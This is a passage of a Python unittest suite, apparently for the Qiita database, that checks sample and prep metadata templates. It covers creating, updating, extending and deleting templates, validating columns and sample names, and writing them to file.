'host_subject_id': 'the only one',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'int_column': 2,
'latitude': 4.2,
'longitude': 1.1},
'Sample3': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41},
'Sample4': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 4',
'str_column': 'Value for sample 4',
'int_column': 4,
'latitude': 4.8,
'longitude': 4.41}
}
self.metadata_dict_updated_sample_error = pd.DataFrame.from_dict(
metadata_dict_updated_sample_error, orient='index')
metadata_dict_updated_column_error = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '6',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41,
'extra_col': True},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '5',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'the only one',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'int_column': 2,
'latitude': 4.2,
'longitude': 1.1,
'extra_col': True},
'Sample3': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41,
'extra_col': True},
}
self.metadata_dict_updated_column_error = pd.DataFrame.from_dict(
metadata_dict_updated_column_error, orient='index')
def tearDown(self):
for f in self._clean_up_files:
remove(f)
def test_study_id(self):
"""Ensure that the correct study ID is returned"""
self.assertEqual(self.tester.study_id, 1)
def test_init_unknown_error(self):
"""Init raises an error if the id is not known"""
with self.assertRaises(QiitaDBUnknownIDError):
SampleTemplate(2)
def test_init(self):
"""Init successfully instantiates the object"""
st = SampleTemplate(1)
self.assertEqual(st.id, 1)
def test_table_name(self):
"""Table name return the correct string"""
obs = SampleTemplate._table_name(self.test_study.id)
self.assertEqual(obs, "sample_1")
def test_create_duplicate(self):
"""Create raises an error when creating a duplicated SampleTemplate"""
with self.assertRaises(QiitaDBDuplicateError):
SampleTemplate.create(self.metadata, self.test_study)
def test_create_duplicate_header(self):
"""Create raises an error when duplicate headers are present"""
self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],
index=self.metadata.index)
with self.assertRaises(QiitaDBDuplicateHeaderError):
SampleTemplate.create(self.metadata, self.new_study)
def test_create_bad_sample_names(self):
"""Create raises an error when duplicate headers are present"""
# set a horrible list of sample names
self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']
with self.assertRaises(QiitaDBColumnError):
SampleTemplate.create(self.metadata, self.new_study)
def test_create_error_cleanup(self):
"""Create does not modify the database if an error happens"""
metadata_dict = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'group': 'Forcing the creation to fail',
'latitude': 42.42,
'longitude': 41.41}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
with self.assertRaises(QiitaDBExecutionError):
SampleTemplate.create(metadata, self.new_study)
sql = """SELECT EXISTS(
SELECT * FROM qiita.required_sample_info
WHERE sample_id=%s)"""
sample_id = "%d.Sample1" % self.new_study.id
self.assertFalse(
self.conn_handler.execute_fetchone(sql, (sample_id,))[0])
sql = """SELECT EXISTS(
SELECT * FROM qiita.study_sample_columns
WHERE study_id=%s)"""
self.assertFalse(
self.conn_handler.execute_fetchone(sql, (self.new_study.id,))[0])
self.assertFalse(
exists_table("sample_%d" % self.new_study.id, self.conn_handler))
def test_create(self):
"""Creates a new SampleTemplate"""
st = SampleTemplate.create(self.metadata, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
self.assertEqual(obs, exp)
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"], [2L, 'int_column', 'integer']]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, int_column, str_column
exp = [['2.Sample1', 1, "Value for sample 1"],
['2.Sample2', 2, "Value for sample 2"],
['2.Sample3', 3, "Value for sample 3"]]
self.assertEqual(obs, exp)
def test_create_int_prefix(self):
"""Creates a new SampleTemplate"""
st = SampleTemplate.create(self.metadata_int_pref, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.12.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.12.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.12.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
self.assertEqual(obs, exp)
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"]]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, str_column
exp = [['2.12.Sample1', "Value for sample 1"],
['2.12.Sample2', "Value for sample 2"],
['2.12.Sample3', "Value for sample 3"]]
self.assertEqual(obs, exp)
def test_create_str_prefixes(self):
"""Creates a new SampleTemplate"""
st = SampleTemplate.create(self.metadata_str_prefix, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.foo.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.bar.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.foo.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"]]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, str_column
exp = [['2.foo.Sample1', "Value for sample 1"],
['2.bar.Sample2', "Value for sample 2"],
['2.foo.Sample3', "Value for sample 3"]]
self.assertEqual(sorted(obs), sorted(exp))
def test_create_already_prefixed_samples(self):
"""Creates a new SampleTemplate with the samples already prefixed"""
st = npt.assert_warns(QiitaDBWarning, SampleTemplate.create,
self.metadata_prefixed, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
self.assertEqual(obs, exp)
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"]]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, str_column
exp = [['2.Sample1', "Value for sample 1"],
['2.Sample2', "Value for sample 2"],
['2.Sample3', "Value for sample 3"]]
self.assertEqual(obs, exp)
def test_delete(self):
"""Deletes Sample template 1"""
SampleTemplate.create(self.metadata, self.new_study)
SampleTemplate.delete(2)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
exp = []
self.assertEqual(obs, exp)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
exp = []
self.assertEqual(obs, exp)
with self.assertRaises(QiitaDBExecutionError):
self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
def test_delete_unknown_id_error(self):
"""Try to delete a non-existent sample template"""
with self.assertRaises(QiitaDBUnknownIDError):
SampleTemplate.delete(5)
def test_exists_true(self):
"""Exists returns true when the SampleTemplate already exists"""
self.assertTrue(SampleTemplate.exists(self.test_study.id))
def test_exists_false(self):
"""Exists returns false when the SampleTemplate does not exists"""
self.assertFalse(SampleTemplate.exists(self.new_study.id))
def test_get_sample_ids(self):
"""get_sample_ids returns the correct set of sample ids"""
obs = self.tester._get_sample_ids(self.conn_handler)
self.assertEqual(obs, self.exp_sample_ids)
def test_len(self):
"""Len returns the correct number of sample ids"""
self.assertEqual(len(self.tester), 27)
def test_getitem(self):
"""Get item returns the correct sample object"""
obs = self.tester['1.SKM7.640188']
exp = Sample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_getitem_error(self):
"""Get item raises an error if key does not exists"""
with self.assertRaises(KeyError):
self.tester['Not_a_Sample']
def test_update_category(self):
"""setitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBUnknownIDError):
self.tester.update_category('country', {"foo": "bar"})
with self.assertRaises(QiitaDBColumnError):
self.tester.update_category('missing column',
{'1.SKM7.640188': 'stuff'})
negtest = self.tester['1.SKM7.640188']['country']
mapping = {'1.SKB1.640202': "1",
'1.SKB5.640181': "2",
'1.SKD6.640190': "3"}
self.tester.update_category('country', mapping)
self.assertEqual(self.tester['1.SKB1.640202']['country'], "1")
self.assertEqual(self.tester['1.SKB5.640181']['country'], "2")
self.assertEqual(self.tester['1.SKD6.640190']['country'], "3")
self.assertEqual(self.tester['1.SKM7.640188']['country'], negtest)
# test updating a required_sample_info
mapping = {'1.SKB1.640202': "1",
'1.SKB5.640181': "2",
'1.SKD6.640190': "3"}
self.tester.update_category('required_sample_info_status_id', mapping)
self.assertEqual(
self.tester['1.SKB1.640202']['required_sample_info_status'],
"received")
self.assertEqual(
self.tester['1.SKB5.640181']['required_sample_info_status'],
"in_preparation")
self.assertEqual(
self.tester['1.SKD6.640190']['required_sample_info_status'],
"running")
self.assertEqual(
self.tester['1.SKM7.640188']['required_sample_info_status'],
"completed")
# testing that it fails when trying to change an int column value
# to str
st = SampleTemplate.create(self.metadata, self.new_study)
mapping = {'2.Sample1': "no_value"}
with self.assertRaises(ValueError):
st.update_category('int_column', mapping)
def test_update(self):
"""Updates values in existing mapping file"""
# creating a new sample template
st = SampleTemplate.create(self.metadata, self.new_study)
# updating the sample template
st.update(self.metadata_dict_updated)
# validating values
exp = self.metadata_dict_updated_dict['Sample1'].values()
obs = st.get('2.Sample1').values()
self.assertItemsEqual(obs, exp)
exp = self.metadata_dict_updated_dict['Sample2'].values()
obs = st.get('2.Sample2').values()
self.assertItemsEqual(obs, exp)
exp = self.metadata_dict_updated_dict['Sample3'].values()
obs = st.get('2.Sample3').values()
self.assertItemsEqual(obs, exp)
# checking errors
with self.assertRaises(QiitaDBError):
st.update(self.metadata_dict_updated_sample_error)
with self.assertRaises(QiitaDBError):
st.update(self.metadata_dict_updated_column_error)
def test_add_category(self):
column = "new_column"
dtype = "varchar"
default = "stuff"
mapping = {'1.SKB1.640202': "1",
'1.SKB5.640181': "2",
'1.SKD6.640190': "3"}
exp = {
'1.SKB1.640202': "1",
'1.SKB2.640194': "stuff",
'1.SKB3.640195': "stuff",
'1.SKB4.640189': "stuff",
'1.SKB5.640181': "2",
'1.SKB6.640176': "stuff",
'1.SKB7.640196': "stuff",
'1.SKB8.640193': "stuff",
'1.SKB9.640200': "stuff",
'1.SKD1.640179': "stuff",
'1.SKD2.640178': "stuff",
'1.SKD3.640198': "stuff",
'1.SKD4.640185': "stuff",
'1.SKD5.640186': "stuff",
'1.SKD6.640190': "3",
'1.SKD7.640191': "stuff",
'1.SKD8.640184': "stuff",
'1.SKD9.640182': "stuff",
'1.SKM1.640183': "stuff",
'1.SKM2.640199': "stuff",
'1.SKM3.640197': "stuff",
'1.SKM4.640180': "stuff",
'1.SKM5.640177': "stuff",
'1.SKM6.640187': "stuff",
'1.SKM7.640188': "stuff",
'1.SKM8.640201': "stuff",
'1.SKM9.640192': "stuff"}
self.tester.add_category(column, mapping, dtype, default)
obs = {k: v['new_column'] for k, v in self.tester.items()}
self.assertEqual(obs, exp)
def test_categories(self):
exp = {'season_environment',
'assigned_from_geo', 'texture', 'taxon_id', 'depth',
'host_taxid', 'common_name', 'water_content_soil', 'elevation',
'temp', 'tot_nitro', 'samp_salinity', 'altitude', 'env_biome',
'country', 'ph', 'anonymized_name', 'tot_org_carb',
'description_duplicate', 'env_feature'}
obs = self.tester.categories()
self.assertEqual(obs, exp)
def test_remove_category(self):
with self.assertRaises(QiitaDBColumnError):
self.tester.remove_category('does not exist')
for v in self.tester.values():
self.assertIn('elevation', v)
self.tester.remove_category('elevation')
for v in self.tester.values():
self.assertNotIn('elevation', v)
def test_iter(self):
"""iter returns an iterator over the sample ids"""
obs = iter(self.tester)
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_contains_true(self):
"""contains returns true if the sample id exists"""
self.assertTrue('1.SKM7.640188' in self.tester)
def test_contains_false(self):
"""contains returns false if the sample id does not exists"""
self.assertFalse('Not_a_Sample' in self.tester)
def test_keys(self):
"""keys returns an iterator over the sample ids"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {Sample('1.SKB1.640202', self.tester),
Sample('1.SKB2.640194', self.tester),
Sample('1.SKB3.640195', self.tester),
Sample('1.SKB4.640189', self.tester),
Sample('1.SKB5.640181', self.tester),
Sample('1.SKB6.640176', self.tester),
Sample('1.SKB7.640196', self.tester),
Sample('1.SKB8.640193', self.tester),
Sample('1.SKB9.640200', self.tester),
Sample('1.SKD1.640179', self.tester),
Sample('1.SKD2.640178', self.tester),
Sample('1.SKD3.640198', self.tester),
Sample('1.SKD4.640185', self.tester),
Sample('1.SKD5.640186', self.tester),
Sample('1.SKD6.640190', self.tester),
Sample('1.SKD7.640191', self.tester),
Sample('1.SKD8.640184', self.tester),
Sample('1.SKD9.640182', self.tester),
Sample('1.SKM1.640183', self.tester),
Sample('1.SKM2.640199', self.tester),
Sample('1.SKM3.640197', self.tester),
Sample('1.SKM4.640180', self.tester),
Sample('1.SKM5.640177', self.tester),
Sample('1.SKM6.640187', self.tester),
Sample('1.SKM7.640188', self.tester),
Sample('1.SKM8.640201', self.tester),
Sample('1.SKM9.640192', self.tester)}
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs), key=lambda x: x.id),
sorted(exp, key=lambda x: x.id)):
self.assertEqual(o, e)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = [('1.SKB1.640202', Sample('1.SKB1.640202', self.tester)),
('1.SKB2.640194', Sample('1.SKB2.640194', self.tester)),
('1.SKB3.640195', Sample('1.SKB3.640195', self.tester)),
('1.SKB4.640189', Sample('1.SKB4.640189', self.tester)),
('1.SKB5.640181', Sample('1.SKB5.640181', self.tester)),
('1.SKB6.640176', Sample('1.SKB6.640176', self.tester)),
('1.SKB7.640196', Sample('1.SKB7.640196', self.tester)),
('1.SKB8.640193', Sample('1.SKB8.640193', self.tester)),
('1.SKB9.640200', Sample('1.SKB9.640200', self.tester)),
('1.SKD1.640179', Sample('1.SKD1.640179', self.tester)),
('1.SKD2.640178', Sample('1.SKD2.640178', self.tester)),
('1.SKD3.640198', Sample('1.SKD3.640198', self.tester)),
('1.SKD4.640185', Sample('1.SKD4.640185', self.tester)),
('1.SKD5.640186', Sample('1.SKD5.640186', self.tester)),
('1.SKD6.640190', Sample('1.SKD6.640190', self.tester)),
('1.SKD7.640191', Sample('1.SKD7.640191', self.tester)),
('1.SKD8.640184', Sample('1.SKD8.640184', self.tester)),
('1.SKD9.640182', Sample('1.SKD9.640182', self.tester)),
('1.SKM1.640183', Sample('1.SKM1.640183', self.tester)),
('1.SKM2.640199', Sample('1.SKM2.640199', self.tester)),
('1.SKM3.640197', Sample('1.SKM3.640197', self.tester)),
('1.SKM4.640180', Sample('1.SKM4.640180', self.tester)),
('1.SKM5.640177', Sample('1.SKM5.640177', self.tester)),
('1.SKM6.640187', Sample('1.SKM6.640187', self.tester)),
('1.SKM7.640188', Sample('1.SKM7.640188', self.tester)),
('1.SKM8.640201', Sample('1.SKM8.640201', self.tester)),
('1.SKM9.640192', Sample('1.SKM9.640192', self.tester))]
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs)), sorted(exp)):
self.assertEqual(o, e)
def test_get(self):
"""get returns the correct sample object"""
obs = self.tester.get('1.SKM7.640188')
exp = Sample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_get_none(self):
"""get returns none if the sample id is not present"""
self.assertTrue(self.tester.get('Not_a_Sample') is None)
def test_to_file(self):
"""to file writes a tab delimited file with all the metadata"""
fd, fp = mkstemp()
close(fd)
st = SampleTemplate.create(self.metadata, self.new_study)
st.to_file(fp)
self._clean_up_files.append(fp)
with open(fp, 'U') as f:
obs = f.read()
self.assertEqual(obs, EXP_SAMPLE_TEMPLATE)
fd, fp = mkstemp()
close(fd)
st.to_file(fp, {'2.Sample1', '2.Sample3'})
self._clean_up_files.append(fp)
with open(fp, 'U') as f:
obs = f.read()
self.assertEqual(obs, EXP_SAMPLE_TEMPLATE_FEWER_SAMPLES)
def test_get_filepath(self):
# we will check that there is a new id only because the path will
# change based on time and the same functionality is being tested
# in data.py
exp_id = self.conn_handler.execute_fetchone(
"SELECT count(1) FROM qiita.filepath")[0] + 1
st = SampleTemplate.create(self.metadata, self.new_study)
self.assertEqual(st.get_filepaths()[0][0], exp_id)
# testing current functionality: to add a new sample template
# you need to erase it first
SampleTemplate.delete(st.id)
exp_id += 1
st = SampleTemplate.create(self.metadata, self.new_study)
self.assertEqual(st.get_filepaths()[0][0], exp_id)
def test_extend(self):
# add new column and delete one that exists
self.metadata['NEWCOL'] = pd.Series(['val1', 'val2', 'val3'],
index=self.metadata.index)
self.tester.extend(self.metadata)
# test samples were appended successfully
sql = ("SELECT sample_id FROM qiita.required_sample_info WHERE "
"study_id = 1")
obs = self.conn_handler.execute_fetchall(sql)
exp = [['1.SKB8.640193'], ['1.SKD8.640184'], ['1.SKB7.640196'],
['1.SKM9.640192'], ['1.SKM4.640180'], ['1.SKM5.640177'],
['1.SKB5.640181'], ['1.SKD6.640190'], ['1.SKB2.640194'],
['1.SKD2.640178'], ['1.SKM7.640188'], ['1.SKB1.640202'],
['1.SKD1.640179'], ['1.SKD3.640198'], ['1.SKM8.640201'],
['1.SKM2.640199'], ['1.SKB9.640200'], ['1.SKD5.640186'],
['1.SKM3.640197'], ['1.SKD9.640182'], ['1.SKB4.640189'],
['1.SKD7.640191'], ['1.SKM6.640187'], ['1.SKD4.640185'],
['1.SKB3.640195'], ['1.SKB6.640176'], ['1.SKM1.640183'],
['1.Sample1'], ['1.Sample2'], ['1.Sample3']]
self.assertEqual(obs, exp)
sql = "SELECT sample_id FROM qiita.sample_1"
obs = self.conn_handler.execute_fetchall(sql)
exp = [['1.SKM7.640188'], ['1.SKD9.640182'], ['1.SKM8.640201'],
['1.SKB8.640193'], ['1.SKD2.640178'], ['1.SKM3.640197'],
['1.SKM4.640180'], ['1.SKB9.640200'], ['1.SKB4.640189'],
['1.SKB5.640181'], ['1.SKB6.640176'], ['1.SKM2.640199'],
['1.SKM5.640177'], ['1.SKB1.640202'], ['1.SKD8.640184'],
['1.SKD4.640185'], ['1.SKB3.640195'], ['1.SKM1.640183'],
['1.SKB7.640196'], ['1.SKD3.640198'], ['1.SKD7.640191'],
['1.SKD6.640190'], ['1.SKB2.640194'], ['1.SKM9.640192'],
['1.SKM6.640187'], ['1.SKD5.640186'], ['1.SKD1.640179'],
['1.Sample1'], ['1.Sample2'], ['1.Sample3']]
self.assertEqual(obs, exp)
# test new columns were added to *_cols table and dynamic table
obs = get_table_cols('sample_1', self.conn_handler)
exp = ['sample_id', 'season_environment', 'assigned_from_geo',
'texture', 'taxon_id', 'depth', 'host_taxid', 'common_name',
'water_content_soil', 'elevation', 'temp', 'tot_nitro',
'samp_salinity', 'altitude', 'env_biome', 'country', 'ph',
'anonymized_name', 'tot_org_carb', 'description_duplicate',
'env_feature', 'newcol', 'str_column', 'int_column']
self.assertItemsEqual(obs, exp)
sql = "SELECT * FROM qiita.study_sample_columns WHERE study_id = 1"
obs = self.conn_handler.execute_fetchall(sql)
exp = [[1, 'str_column', 'varchar'], [1, 'newcol', 'varchar'],
[1, 'ENV_FEATURE', 'varchar'],
[1, 'Description_duplicate', 'varchar'],
[1, 'TOT_ORG_CARB', 'float8'],
[1, 'ANONYMIZED_NAME', 'varchar'], [1, 'PH', 'float8'],
[1, 'COUNTRY', 'varchar'], [1, 'ENV_BIOME', 'varchar'],
[1, 'ALTITUDE', 'float8'], [1, 'SAMP_SALINITY', 'float8'],
[1, 'TOT_NITRO', 'float8'], [1, 'TEMP', 'float8'],
[1, 'ELEVATION', 'float8'],
[1, 'WATER_CONTENT_SOIL', 'float8'],
[1, 'COMMON_NAME', 'varchar'], [1, 'HOST_TAXID', 'varchar'],
[1, 'DEPTH', 'float8'], [1, 'TAXON_ID', 'varchar'],
[1, 'TEXTURE', 'varchar'],
[1, 'ASSIGNED_FROM_GEO', 'varchar'],
[1, 'SEASON_ENVIRONMENT', 'varchar'],
[1, 'sample_id', 'varchar'],
[1, 'int_column', 'integer']]
self.assertItemsEqual(obs, exp)
def test_extend_duplicated_samples(self):
# First add new samples to template
self.tester.extend(self.metadata)
self.metadata_dict['Sample5'] = {
'physical_location': 'location5',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type5',
'required_sample_info_status': 'received',
'collection_timestamp': datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 5',
'str_column': 'Value for sample 5',
'int_column': 5,
'latitude': 45.45,
'longitude': 44.44}
new_metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
# Make sure adding duplicate samples raises warning
npt.assert_warns(QiitaDBWarning, self.tester.extend, new_metadata)
# Make sure the unknown sample was still added to the study
sql = "SELECT sample_id FROM qiita.sample_1"
obs = self.conn_handler.execute_fetchall(sql)
exp = [['1.SKM7.640188'], ['1.SKD9.640182'], ['1.SKM8.640201'],
['1.SKB8.640193'], ['1.SKD2.640178'], ['1.SKM3.640197'],
['1.SKM4.640180'], ['1.SKB9.640200'], ['1.SKB4.640189'],
['1.SKB5.640181'], ['1.SKB6.640176'], ['1.SKM2.640199'],
['1.SKM5.640177'], ['1.SKB1.640202'], ['1.SKD8.640184'],
['1.SKD4.640185'], ['1.SKB3.640195'], ['1.SKM1.640183'],
['1.SKB7.640196'], ['1.SKD3.640198'], ['1.SKD7.640191'],
['1.SKD6.640190'], ['1.SKB2.640194'], ['1.SKM9.640192'],
['1.SKM6.640187'], ['1.SKD5.640186'], ['1.SKD1.640179'],
['1.Sample1'], ['1.Sample2'], ['1.Sample3'], ['1.Sample5']]
self.assertEqual(obs, exp)
@qiita_test_checker()
class TestPrepTemplate(TestCase):
"""Tests the PrepTemplate class"""
def setUp(self):
self.metadata_dict = {
'SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 1',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'GTCCGCAAGTTA',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 2',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CGTAGAGCTCTC',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 3',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CCTCTGAGAGCT',
'run_prefix': "s_G1_L002_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'}
}
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
metadata_prefixed_dict = {
'1.SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 1',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'GTCCGCAAGTTA',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'1.SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 2',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CGTAGAGCTCTC',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'1.SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 3',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CCTCTGAGAGCT',
'run_prefix': "s_G1_L002_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'}
}
self.metadata_prefixed = pd.DataFrame.from_dict(metadata_prefixed_dict,
orient='index')
self.test_raw_data = RawData(1)
self.test_study = Study(1)
self.data_type = "18S"
self.data_type_id = 2
fd, seqs_fp = mkstemp(suffix='_seqs.fastq')
close(fd)
fd, barcodes_fp = mkstemp(suffix='_barcodes.fastq')
close(fd)
filepaths = [(seqs_fp, 1), (barcodes_fp, 2)]
with open(seqs_fp, "w") as f:
f.write("\n")
